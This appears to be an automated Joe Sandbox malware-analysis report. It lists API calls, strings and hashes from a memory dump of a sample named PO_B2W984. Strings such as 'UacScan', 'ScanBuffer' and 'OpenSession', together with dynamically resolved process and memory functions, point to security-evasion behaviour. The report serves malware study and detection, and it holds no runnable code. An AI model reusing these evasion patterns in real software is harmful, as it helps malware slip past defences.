  • Part of subcall function 02DD5A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02DD0000,02DFD790), ref: 02DD5AD0
  • Part of subcall function 02DD5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02DD5AEE
  • Part of subcall function 02DD5A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02DD5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02DD5B37
  • Part of subcall function 02DD5A78: RegQueryValueExA.ADVAPI32(?,02DD5CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02DD5B7D,?,80000001), ref: 02DD5B55
  • Part of subcall function 02DD5A78: RegCloseKey.ADVAPI32(?,02DD5B84,00000000,?,?,00000000,02DD5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02DD5B77
Memory Dump Source
• Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
Similarity
• API ID: Open$FileModuleNameQueryValue$Close
• String ID:
• API String ID: 2796650324-0
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02DD7DA8
Memory Dump Source
• Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
• GetFileAttributesA.KERNEL32(00000000,?,02DEF8C4,ScanString,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,ScanString,02E3137C,02DFAFD0,UacScan,02E3137C,02DFAFD0,UacInitialize), ref: 02DD7E1B
Memory Dump Source
• Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• GetFileAttributesA.KERNEL32(00000000,?,02DF2A41,ScanString,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,ScanBuffer,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,Initialize), ref: 02DD7E3F
Memory Dump Source
• Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: fe3f8c7547375d3b190e2bd7b8d67a4577ec7d15bc45dec9ccb4955a6e8d04a7
• Instruction ID: cc5fa8bdee2d4ecec393d1f424fc7c8e78642ce55a9a4210a4061dad55ceab7a
• Instruction Fuzzy Hash: E6C08CA0302A050E2E50A2FC1CC450A428C8904238BA02FA1E13CC63D2D321DC972820
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
Similarity
• API ID: FreeString
• String ID:
• API String ID: 3341692771-0
• Opcode ID: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
• Instruction ID: 971d4bcb40f98681362e4a9d6efd0705b0ff6d52e5e7a78dde7127ca0d1a67ff
• Instruction Fuzzy Hash: F5C012A2600A2457EB215A9C9CC0B5572CCDB05295F1804A1D408D7340E371DC008A74
APIs
• timeSetEvent.WINMM(00002710,00000000,02DFBB3C,00000000,00000001), ref: 02DFBB58
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
Similarity
• API ID: Eventtime
• String ID:
• API String ID: 2982266575-0
• Opcode ID: af41d9c9adc96d4eb2c37b0777c1772169e02efa246ddf24940318e156a91774
• Instruction ID: b9c02c09f8f8e9e591d7b9eccfc7c67c003e43f70ec13ceb7c203fb5bb3a94bc
• Instruction Fuzzy Hash: 46C092F07923403EFA20A6EC5CC2F63658DD308B10F610812BB00EE3C2D1E24C948A74
APIs
• SysAllocStringLen.OLEAUT32(00000000,?), ref: 02DD4BEB
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
Similarity
• API ID: AllocString
• String ID:
• API String ID: 2525500382-0
• Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
• Instruction ID: ab7acb529fd135444c494c1007f3cb00cb0dc603ff191908533823041b54831d
• Instruction Fuzzy Hash: 46B0123C288E0218FB1011A10D01B32008C8F7038BF8600919EA9C83C0FF22CC01CC32
APIs
• SysFreeString.OLEAUT32(00000000), ref: 02DD4C03
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
Similarity
• API ID: FreeString
• String ID:
• API String ID: 3341692771-0
• Opcode ID: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
• Instruction ID: c14b5896ef3e990528d510ccb73e47aeab023aa1b9b364b479db1df8f8f09aac
• Instruction Fuzzy Hash: 7BA022AC080F030A8F2B232C000022A2033FFE2300BCAC8E8C0000A2008F3BCC00EC30
APIs
• VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02DD2000), ref: 02DD16A4
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 835ac4c344d1cb34f353791ff78fa829f310ecbbd10c3b10381db3e2b118257c
• Instruction ID: f5255a21a5c5ce9f3ca365c796bd2c843328af9a4fc9639d6d2a28e6aa37fa9b
• Instruction Fuzzy Hash: 36F09AB2A84B996BD711AE5ADC84B82BB94FB00326F454139FA489B340D770AC50CBE4
APIs
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 02DD1704
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: f9d10ed22081e2e74c713146da8ecd89b28e72bedc14130c51f5585bfa16bbd4
• Instruction ID: ce8220ca2f6cd8b70348f5f524a32e48f98d502fb47b5d32fddfa3824e7cb021
• Instruction Fuzzy Hash: D2E08C79300B11AFE7105A7A9D84B12ABDCEB48664F244476F649DB392D2A0EC50CB70
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02DEABDB,?,?,02DEAC6D,00000000,02DEAD49), ref: 02DEA968
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02DEA980
• GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02DEA992
• GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02DEA9A4
• GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02DEA9B6
• GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02DEA9C8
• GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02DEA9DA
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 02DEA9EC
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02DEA9FE
• GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02DEAA10
• GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02DEAA22
• GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02DEAA34
• GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02DEAA46
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 02DEAA58
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02DEAA6A
• GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02DEAA7C
• GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02DEAA8E
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                        • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                        • API String ID: 667068680-597814768
                                                                                                                                        • Opcode ID: 43f3a2208166fe427f59bf193f850ab6cebf7f245ab849524b775232cafd582b
                                                                                                                                        • Instruction ID: 9ebd0987659128ecda835f696dc1d6794e95242656b5392172276b1dddf17c28
                                                                                                                                        • Opcode Fuzzy Hash: 43f3a2208166fe427f59bf193f850ab6cebf7f245ab849524b775232cafd582b
                                                                                                                                        • Instruction Fuzzy Hash: A031CAB5E84B65AFEF00AFA5E889B2637ADEB05601B4009A9E007CF304D674DC548FE1
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,02DD7330,02DD0000,02DFD790), ref: 02DD58D1
                                                                                                                                        • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02DD58E8
                                                                                                                                        • lstrcpynA.KERNEL32(?,?,?), ref: 02DD5918
                                                                                                                                        • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02DD7330,02DD0000,02DFD790), ref: 02DD597C
                                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02DD7330,02DD0000,02DFD790), ref: 02DD59B2
                                                                                                                                        • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02DD7330,02DD0000,02DFD790), ref: 02DD59C5
                                                                                                                                        • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02DD7330,02DD0000,02DFD790), ref: 02DD59D7
                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02DD7330,02DD0000,02DFD790), ref: 02DD59E3
                                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02DD7330,02DD0000), ref: 02DD5A17
                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02DD7330), ref: 02DD5A23
                                                                                                                                        • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02DD5A45
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                        • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                        • API String ID: 3245196872-1565342463
                                                                                                                                        • Opcode ID: c48ee472776cad9edf59b1713971e1358179d5d8601248af5d7135d02e570367
                                                                                                                                        • Instruction ID: e9b12d0e3e1af4365e33bbe619e7af313935d296a77a6c097a72ee737c1e7a0e
                                                                                                                                        • Opcode Fuzzy Hash: c48ee472776cad9edf59b1713971e1358179d5d8601248af5d7135d02e570367
                                                                                                                                        • Instruction Fuzzy Hash: 9C414C71E00A69AFDB10DAE8DC88ADEB7ADEB08350F4445A5E549E7341D770EE44CF60
                                                                                                                                        APIs
                                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02DD5B94
                                                                                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02DD5BA1
                                                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02DD5BA7
                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02DD5BD2
                                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02DD5C19
                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02DD5C29
                                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02DD5C51
                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02DD5C61
                                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02DD5C87
                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02DD5C97
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                        • API String ID: 1599918012-2375825460
                                                                                                                                        • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                                                                                        • Instruction ID: 3fa391f046d9f42feb5c9b80d0c2226ef730d4b159cc436d984252a262cc2676
                                                                                                                                        • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                                                                                        • Instruction Fuzzy Hash: 0F319571E40A1C2AEB25D6F89C46BDF7BADCB04380F4445E19608E6285DA75DF84CF60
                                                                                                                                        APIs
                                                                                                                                        • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02DD7F75
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DiskFreeSpace
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1705453755-0
                                                                                                                                        • Opcode ID: 0fbec54a0c02fd547ee90df4e96e63df58f4455ae2e88ae87e717fe42b60fd3b
                                                                                                                                        • Instruction ID: 81f7beed8466cdb2bc69cac1f562f405a4db144e56f383dacb6f960f0f9cf8d1
                                                                                                                                        • Opcode Fuzzy Hash: 0fbec54a0c02fd547ee90df4e96e63df58f4455ae2e88ae87e717fe42b60fd3b
                                                                                                                                        • Instruction Fuzzy Hash: 8811FEB5A00609AFDB04CFA9C8809AFB7F9EFC8304B14C569A504EB354E6319E018BA0
                                                                                                                                        APIs
                                                                                                                                        • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02DDA762
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoLocale
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                        • Opcode ID: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                                                                                                                                        • Instruction ID: 86a9cae7bff6a24854ae2c9913d913b85e0c4d274ee05c81d6f8fa8eeac79c0b
                                                                                                                                        • Opcode Fuzzy Hash: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                                                                                                                                        • Instruction Fuzzy Hash: AFE0D83670061427D311A6685C809F6736DD75C310F00827EBD05C7340EEB0DD444EF4
                                                                                                                                        APIs
                                                                                                                                        • GetVersionExA.KERNEL32(?,02DFC106,00000000,02DFC11E), ref: 02DDB71A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Version
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1889659487-0
                                                                                                                                        • Opcode ID: 88651218e8fa3c7128307b3ce3e147bca076633037d5e25117ff356d2298e30a
                                                                                                                                        • Instruction ID: 538b1d9dba1129aeff54d352a59a625936ed174f493ed0de51ec7c5986a21743
                                                                                                                                        • Opcode Fuzzy Hash: 88651218e8fa3c7128307b3ce3e147bca076633037d5e25117ff356d2298e30a
                                                                                                                                        • Instruction Fuzzy Hash: 33F0DA74944701AFC390DF28D540B1977E6FB49718F014969E69ACB380E734DC14CF9A
                                                                                                                                        APIs
                                                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02DDBDF2,00000000,02DDC00B,?,?,00000000,00000000), ref: 02DDA7A3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoLocale
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                        • Opcode ID: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                                                                                                                                        • Instruction ID: 9186296488ea05fbad127abae63c5d120e0e45f87761990acb2824bda7d9fb4d
                                                                                                                                        • Opcode Fuzzy Hash: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                                                                                                                                        • Instruction Fuzzy Hash: 6FD05EAA30E6A03AA220915A2D84D7B5AFCCAC57A1F00807EF588C6300D204CC05D6F1
APIs
Memory Dump Source
• Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
• Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
Similarity
• API ID: LocalTime
• String ID:
• API String ID: 481472006-0
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02DDD21D
  • Part of subcall function 02DDD1E8: GetProcAddress.KERNEL32(00000000), ref: 02DDD201
Strings
Similarity
• API ID: AddressHandleModuleProc
• String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
• API String ID: 1646373207-1918263038
APIs
• GetModuleHandleA.KERNEL32(ole32.dll), ref: 02DE6E5E
• GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02DE6E6F
• GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02DE6E7F
• GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02DE6E8F
• GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02DE6E9F
• GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02DE6EAF
• GetProcAddress.KERNEL32 ref: 02DE6EBF
Strings
Similarity
• API ID: AddressProc$HandleModule
• String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
• API String ID: 667068680-2233174745
APIs
• MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02DD28CE
Strings
Similarity
• API ID: Message
• String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
• API String ID: 2030045667-32948583
Strings
• The sizes of unexpected leaked medium and large blocks are: , xrefs: 02DD2849
• An unexpected memory leak has occurred. , xrefs: 02DD2690
• bytes: , xrefs: 02DD275D
• Unexpected Memory Leak, xrefs: 02DD28C0
• The unexpected small block leaks are:, xrefs: 02DD2707
• , xrefs: 02DD2814
• 7, xrefs: 02DD26A1
Similarity
• API ID:
• String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
• API String ID: 0-2723507874
APIs
• GetThreadLocale.KERNEL32(00000000,02DDC00B,?,?,00000000,00000000), ref: 02DDBD76
  • Part of subcall function 02DDA744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02DDA762
Strings
Similarity
• API ID: Locale$InfoThread
• String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
• API String ID: 4232894706-2493093252
APIs
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02DEAE38
• GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02DEAE4F
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02DEAEE3
• IsBadReadPtr.KERNEL32(?,00000002), ref: 02DEAEEF
• IsBadReadPtr.KERNEL32(?,00000014), ref: 02DEAF03
Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Read$HandleModule
                                                                                                                                        • String ID: KernelBase$LoadLibraryExA
                                                                                                                                        • API String ID: 2226866862-113032527
                                                                                                                                        • Opcode ID: 80d8cbae50d1cb3fe38f79d90bb7f850df3f4d8ff762d321582f2c91f2967e4e
                                                                                                                                        • Instruction ID: 82d6934b3936d7aaaa799fb14a307c0906f0e689cb02937fe8572062069bf403
                                                                                                                                        • Opcode Fuzzy Hash: 80d8cbae50d1cb3fe38f79d90bb7f850df3f4d8ff762d321582f2c91f2967e4e
                                                                                                                                        • Instruction Fuzzy Hash: 613119B6A40206BBDF20EB68DC85F5A77A8EF05768F044550EA56EB3C0D770ED40DBA1
                                                                                                                                        APIs
                                                                                                                                        • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02DD43F3,?,?,02E307C8,?,?,02DFD7A8,02DD655D,02DFC30D), ref: 02DD4365
                                                                                                                                        • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02DD43F3,?,?,02E307C8,?,?,02DFD7A8,02DD655D,02DFC30D), ref: 02DD436B
                                                                                                                                        • GetStdHandle.KERNEL32(000000F5,02DD43B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02DD43F3,?,?,02E307C8), ref: 02DD4380
                                                                                                                                        • WriteFile.KERNEL32(00000000,000000F5,02DD43B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02DD43F3,?,?), ref: 02DD4386
                                                                                                                                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02DD43A4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
